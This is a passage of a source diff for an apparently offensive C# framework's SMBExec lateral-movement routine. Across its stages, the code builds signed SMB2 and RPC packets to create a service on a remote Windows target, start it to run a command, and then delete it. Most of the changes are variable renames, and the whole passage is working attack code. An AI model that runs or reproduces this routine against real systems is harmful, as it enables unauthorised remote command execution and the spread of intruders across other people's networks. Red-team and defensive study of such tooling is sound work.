-                                                packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                                Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                             }
-                                            OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, null);
-                                            byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                            OrderedDictionary packet_SMB_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length + SCM_data.Length);
-                                            byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                            byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                            int RPC_data_Length = SMB2_data.Length + SCM_data.Length + RPC_data.Length;
-                                            OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_Length);
-                                            byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                            if (SMB_signing)
+                                            Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, null);
+                                            RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                            Packet_SMB_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
+                                            SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                            int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
+                                            NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
+                                            if (SMB_Signing)
                                             {
-                                                HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                                byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                                byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                                HMAC_SHA256 = new HMACSHA256();
+                                                SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                                SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                                 SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                                packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                                SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                                Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                                SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                             }
-                                            SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                            SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                            SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                            SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                             SMBClientStage = "ReadRequest";
-                                            SMB_client_stage_next = "StartServiceW";
+                                            SMB_Client_Stage_Next = "StartServiceW";
 
                                         }
                                     }
                                     break;
                                 case "CreateServiceW_First":
                                     {
-                                        SMB_split_stage_final = Math.Ceiling((double)SCM_data.Length / SMB_split_index);
-                                        SMB2_message_ID += 20;
-                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                        if (SMB_signing)
+                                        SMB_Split_Stage_final = Math.Ceiling((double)SCM_Data.Length / SMB_Split_Index);
+                                        SMB2_Message_ID += 20;
+                                        Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                        Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
 
-                                        byte[] SCM_data_first = Utilities.GetByteRange(SCM_data, 0, SMB_split_index - 1);
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x01 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_data_first);
-                                        packet_RPC_data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_data.Length);
-                                        SMB_split_index_tracker = SMB_split_index;
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length);
-                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                        int RPC_data_length = SMB2_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
-                                        if (SMB_signing)
+                                        byte[] SCM_Data_First = Utilities.GetByteRange(SCM_Data, 0, SMB_Split_Index - 1);
+                                        Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x01 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_First);
+                                        Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length);
+                                        SMB_Split_Index_Tracker = SMB_Split_Index;
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
+                                        SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                        SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                        int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
+                                        if (SMB_Signing)
                                         {
-                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).ToArray();
-                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            HMAC_SHA256 = new HMACSHA256();
+                                            SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
+                                            SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
 
-                                        if (SMB_split_stage_final <= 2)
+                                        if (SMB_Split_Stage_final <= 2)
                                         {
                                             SMBClientStage = "CreateServiceW_Last";
                                         }
                                         else
                                         {
-                                            SMB_split_stage = 2;
+                                            SMB_Split_Stage = 2;
                                             SMBClientStage = "CreateServiceW_Middle";
                                         }
                                     }
@@ -2402,37 +2381,36 @@ namespace SharpSploit.LateralMovement
 
                                 case "CreateServiceW_Middle":
                                     {
-                                        SMB_split_stage++;
-                                        SMB2_message_ID++;
-                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                        if (SMB_signing)
+                                        SMB_Split_Stage++;
+                                        SMB2_Message_ID++;
+                                        Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                        Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
-                                        byte[] SCM_data_middle = Utilities.GetByteRange(SCM_data, SMB_split_index_tracker, SMB_split_index_tracker + SMB_split_index - 1);
-                                        SMB_split_index_tracker += SMB_split_index;
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x00 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_data_middle);
-                                        packet_RPC_data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_data.Length - SMB_split_index_tracker + SMB_split_index);
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length);
-                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                        int RPC_data_length = SMB2_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
-                                        if (SMB_signing)
+                                        byte[] SCM_Data_Middle = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SMB_Split_Index_Tracker + SMB_Split_Index - 1);
+                                        SMB_Split_Index_Tracker += SMB_Split_Index;
+                                        Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x00 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Middle);
+                                        Packet_RPC_Data["RPCRequest_AllocHint"] = BitConverter.GetBytes(SCM_Data.Length - SMB_Split_Index_Tracker + SMB_Split_Index);
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
+                                        SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                        SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                        int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
+                                        if (SMB_Signing)
                                         {
-                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).ToArray();
-                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            HMAC_SHA256 = new HMACSHA256();
+                                            SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
+                                            SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
-                                        if (SMB_split_stage >= SMB_split_stage_final)
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
+                                        if (SMB_Split_Stage >= SMB_Split_Stage_final)
                                         {
                                             SMBClientStage = "CreateServiceW_Last";
                                         }
@@ -2445,35 +2423,34 @@ namespace SharpSploit.LateralMovement
 
                                 case "CreateServiceW_Last":
                                     {
-                                        SMB2_message_ID++;
-                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                        if (SMB_signing)
+                                        SMB2_Message_ID++;
+                                        Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                        Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
-                                        byte[] SCM_data_last = Utilities.GetByteRange(SCM_data, SMB_split_index_tracker, SCM_data.Length);
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x02 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_data_last);
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length);
-                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                        int RPC_data_length = SMB2_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
-                                        if (SMB_signing)
+                                        byte[] SCM_Data_Last = Utilities.GetByteRange(SCM_Data, SMB_Split_Index_Tracker, SCM_Data.Length);
+                                        Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x02 }, 0, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0c, 0x00 }, SCM_Data_Last);
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
+                                        SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                        SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                        int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
+                                        if (SMB_Signing)
                                         {
-                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).ToArray();
-                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            HMAC_SHA256 = new HMACSHA256();
+                                            SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
+                                            SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "ReadRequest";
-                                        SMB_client_stage_next = "StartServiceW";
+                                        SMB_Client_Stage_Next = "StartServiceW";
                                     }
                                     break;
 
@@ -2481,48 +2458,47 @@ namespace SharpSploit.LateralMovement
                                     {
                                         if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 132, 135)) == "00-00-00-00")
                                         {
-                                            if (debug) { output.AppendLine(String.Format("Service {0} created on {1}", SMB_service, target)); }
-                                            SMB_service_context_handle = Utilities.GetByteRange(SMBClientReceive, 112, 131);
-                                            SMB2_message_ID += 20;
-                                            packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                            packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                            if (SMB_signing)
+                                            if (debug) { output.AppendLine(String.Format("Service {0} created on {1}", SMB_Service, Target)); }
+                                            SMB_Service_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 112, 131);
+                                            SMB2_Message_ID += 20;
+                                            Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                            Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                            if (SMB_Signing)
                                             {
-                                                packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                                Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                             }
-                                            OrderedDictionary packet_SCM_data = SMBExec.SCMStartServiceW(SMB_service_context_handle);
-                                            SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
-                                            OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x13, 0x00 }, null);
-                                            byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                            OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length + SCM_data.Length);
-                                            byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                            byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                            int RPC_data_length = SMB2_data.Length + SCM_data.Length + RPC_data.Length;
-                                            OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
-                                            byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
-                                            if (SMB_signing)
+                                            Packet_SCM_Data = SMBExec.SCMStartServiceW(SMB_Service_Context_Handle);
+                                            SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
+                                            Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x13, 0x00 }, null);
+                                            RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                            Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                            SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                            int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
+                                            NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
+                                            if (SMB_Signing)
                                             {
-                                                HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                                byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                                byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                                HMAC_SHA256 = new HMACSHA256();
+                                                SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                                SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                                 SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                                packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                                SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                                Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                                SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                             }
-                                            SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                            SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                            SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                            SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                             SMBClientStage = "ReadRequest";
-                                            SMB_client_stage_next = "DeleteServiceW";
+                                            SMB_Client_Stage_Next = "DeleteServiceW";
                                         }
                                         else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 132, 135)) == "31-04-00-00")
                                         {
-                                            if (debug) { output.AppendLine(String.Format("Service {0} creation failed on {1}", SMB_service, target)); }
-                                            SMBExec_failed = true;
+                                            if (debug) { output.AppendLine(String.Format("Service {0} creation failed on {1}", SMB_Service, Target)); }
+                                            SMBExec_Failed = true;
                                         }
                                         else
                                         {
                                             if (debug) { output.AppendLine("Service Creation Fault Context Mismatch."); }
-                                            SMBExec_failed = true;
+                                            SMBExec_Failed = true;
                                         }
                                     }
                                     break;
@@ -2531,189 +2507,186 @@ namespace SharpSploit.LateralMovement
                                     {
                                         if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "1d-04-00-00")
                                         {
-                                            output.AppendLine(String.Format("Command executed with service {0} on {1}", SMB_service, target));
+                                            output.AppendLine(String.Format("Command executed with service {0} on {1}", SMB_Service, Target));
                                         }
                                         else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 111)) == "02-00-00-00")
                                         {
-                                            output.AppendLine(String.Format("Service {0} failed to start on {1}", SMB_service, target));
+                                            output.AppendLine(String.Format("Service {0} failed to start on {1}", SMB_Service, Target));
                                         }
 
-                                        SMB2_message_ID += 20;
-                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                        if (SMB_signing)
+                                        SMB2_Message_ID += 20;
+                                        Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                        Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
 
-                                        OrderedDictionary packet_SCM_data = SMBExec.SCMDeleteServiceW(SMB_service_context_handle);
-                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length + SCM_data.Length);
-                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                        int RPC_data_length = SMB2_data.Length + SCM_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
-                                        if (SMB_signing)
+                                        Packet_SCM_Data = SMBExec.SCMDeleteServiceW(SMB_Service_Context_Handle);
+                                        SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
+                                        Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x02, 0x00 }, null);
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
+                                        SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                        SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                        int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
+                                        if (SMB_Signing)
                                         {
-                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            HMAC_SHA256 = new HMACSHA256();
+                                            SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                            SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "ReadRequest";
-                                        SMB_client_stage_next = "CloseServiceHandle";
-                                        SMB_close_service_handle_stage = 1;
+                                        SMB_Client_Stage_Next = "CloseServiceHandle";
+                                        SMB_Close_Service_Handle_Stage = 1;
